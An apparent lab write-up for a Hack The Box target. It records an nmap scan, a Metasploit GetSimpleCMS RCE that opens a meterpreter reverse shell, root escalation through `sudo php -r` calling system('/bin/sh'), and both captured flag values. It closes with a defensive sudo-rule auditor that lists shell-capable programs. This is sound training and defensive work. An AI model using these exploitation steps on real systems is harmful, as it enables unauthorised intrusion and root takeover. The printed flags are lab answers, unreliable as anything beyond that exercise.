Challenge

[image: 2024-01-26T10:59:34.png]


Solution

Question 1
Start with an nmap scan to gather information about the target.

┌──(root㉿HgTrojan)-[~]
└─# nmap -sV -sC 10.129.86.24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-26 06:00 EST
Nmap scan report for 10.129.86.24
Host is up (1.1s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
|   256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_  256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/admin/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.36 seconds

Search Metasploit for known GetSimple vulnerabilities.

┌──(root㉿HgTrojan)-[~]
└─# msfconsole 
Metasploit tip: Start commands with a space to avoid saving them to history
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'                                                              
                           /  /                                                                            
                          /  ;                                                                             
              _          /   ;                                                                             
 (`._    _.-"" ""--..__,'    |                                                                             
 <_  `-""                     \                                                                            
  <`-                          :                                                                           
   (__   <__.                  ;                                                                           
     `-.   '-.__.      _.'    /                                                                            
        \      `-.__,-'    _,'                                                                             
         `._    ,    /__,-'                                                                                
            ""._\__,'< <____                                                                               
                 | |  `----.`.                                                                             
                 | |        \ `.                                                                           
                 ; |___      \-``                                                                          
                 \   --<                                                                                   
                  `.`.<                                                                                    
                    `-'                                                                                    
                                                                                                           
                                                                                                           

       =[ metasploit v6.3.51-dev                          ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search GetSimple

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/webapp/get_simple_cms_upload_exec    2014-01-04       excellent  Yes    GetSimpleCMS PHP File Upload Vulnerability
   1  exploit/multi/http/getsimplecms_unauth_code_exec  2019-04-28       excellent  Yes    GetSimpleCMS Unauthenticated RCE


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/getsimplecms_unauth_code_exec                                                                                            

msf6 > 

Exploit the vulnerability to gain a foothold.

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show options 

Module options (exploit/multi/http/getsimplecms_unauth_code_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-m
                                         etasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the cms
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.10.131      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   GetSimpleCMS 3.3.15 and before



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 10.129.86.24
rhosts => 10.129.86.24
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set lhost tun0
lhost => 10.10.16.25
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run

[*] Started reverse TCP handler on 10.10.16.25:4444 
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 1 opened (10.10.16.25:4444 -> 10.129.86.24:36112) at 2024-01-26 06:06:14 -0500
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 2 opened (10.10.16.25:4444 -> 10.129.86.24:36116) at 2024-01-26 06:06:25 -0500

meterpreter > 

Locate the target txt file and print it to complete question 1.

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040755/rwxr-xr-x  4096  dir   2021-05-07 10:28:39 -0400  mrb3n

meterpreter > cd mrb3n
meterpreter > ls
Listing: /home/mrb3n
====================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
020666/rw-rw-rw-  0      cha   2024-01-26 04:01:36 -0500  .bash_history
100644/rw-r--r--  220    fil   2020-02-25 07:03:22 -0500  .bash_logout
100644/rw-r--r--  3771   fil   2020-02-25 07:03:22 -0500  .bashrc
040700/rwx------  4096   dir   2021-02-09 04:12:07 -0500  .cache
100644/rw-r--r--  807    fil   2020-02-25 07:03:22 -0500  .profile
100644/rw-r--r--  0      fil   2021-02-09 05:56:38 -0500  .sudo_as_admin_successful
100600/rw-------  10332  fil   2021-05-07 10:28:39 -0400  .viminfo
100664/rw-rw-r--  33     fil   2021-02-16 06:00:55 -0500  user.txt

meterpreter > cat user.txt
7002d65b149b0a4d19132a66feed21d8

Question 2
Solved using a PHP shell escape.
Command reference: https://gtfobins.github.io/gtfobins/php/
Detailed steps:

meterpreter > shell
Process 75314 created.
Channel 1 created.
whoami
www-data
sudo -l
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
# We can see that our user (www-data) may run /usr/bin/php as ALL without a password

# The shell to spawn: /bin/sh
CMD="/bin/sh"
# Run PHP code directly as root; the code calls PHP's system() function, which executes the shell command stored in $CMD, i.e. /bin/sh.
sudo php -r "system('$CMD');"
# This gives us a root shell
whoami
root

Locate the target txt file and print it to complete question 2.

cat /root/root.txt
f1fba6e9f71efb2630e6e34da6387842
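The root step above works because sudoers grants www-data a general-purpose interpreter. As an added defender-side example that is not part of the original writeup, the following Python script parses `sudo -l` output of the form shown above and flags rules that hand out a program able to run arbitrary code as the run-as user. The sample input embeds the writeup's own rule and adds two constructed lines (a service restart that is not flagged, and a vim entry flagged even though it prompts for a password); the SHELL_CAPABLE list, the regex and the function names are assumptions of this example.

```python
import os
import re

# Constructed sample input: the Defaults block and the /usr/bin/php rule are the
# `sudo -l` output from this writeup; the last two rules are constructed here to
# show one entry that is not flagged and one flagged despite requiring a password.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) NOPASSWD: /usr/sbin/service apache2 restart
    (ALL) /usr/bin/vim
"""

# Programs that can run arbitrary code or spawn a shell when executed via sudo
# (the GTFOBins "sudo" category the writeup links to). Assumed list for this
# example, not an exhaustive catalogue.
SHELL_CAPABLE = {
    "php", "python", "python2", "python3", "perl", "ruby", "node", "lua",
    "vim", "vi", "nano", "less", "more", "awk", "find", "env", "bash", "sh",
}

# One rule line as printed by `sudo -l`: "(runas) TAG: TAG: /path args".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"              # (user) or (user : group)
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"               # optional tags such as NOPASSWD:
    r"(?P<cmd>(?:ALL|/\S+)(?:\s.*)?)\s*$"       # ALL or an absolute command path
)


def parse_sudo_rules(text):
    """Return the rules listed after the 'may run the following commands' line."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m.group("cmd").strip(),
        })
    return rules


def audit_sudo_rules(text):
    """Return (rule, reason) pairs for rules that grant more than they appear to."""
    findings = []
    for rule in parse_sudo_rules(text):
        program = os.path.basename(rule["cmd"].split()[0])
        if rule["cmd"] == "ALL":
            findings.append((rule, "ALL: unrestricted command set"))
        elif program in SHELL_CAPABLE:
            reason = f"{program} can execute arbitrary code as ({rule['runas']})"
            if rule["nopasswd"]:
                reason += " with no password prompt"
            findings.append((rule, reason))
    return findings


if __name__ == "__main__":
    # On a live host: audit_sudo_rules(subprocess.run(["sudo", "-l"], ...).stdout)
    for rule, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"{rule['cmd']:<40} {reason}")
```

Run against the sample, the script reports /usr/bin/php and /usr/bin/vim and leaves the service restart alone. The fix for the entry found on this box is not a stricter tag: sudo's NOEXEC would block system() in dynamically linked programs, but PHP could still read and write files as root. Replace the interpreter grant with a fixed, root-owned, non-writable script that performs the one task www-data actually needs, and grant only that path.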

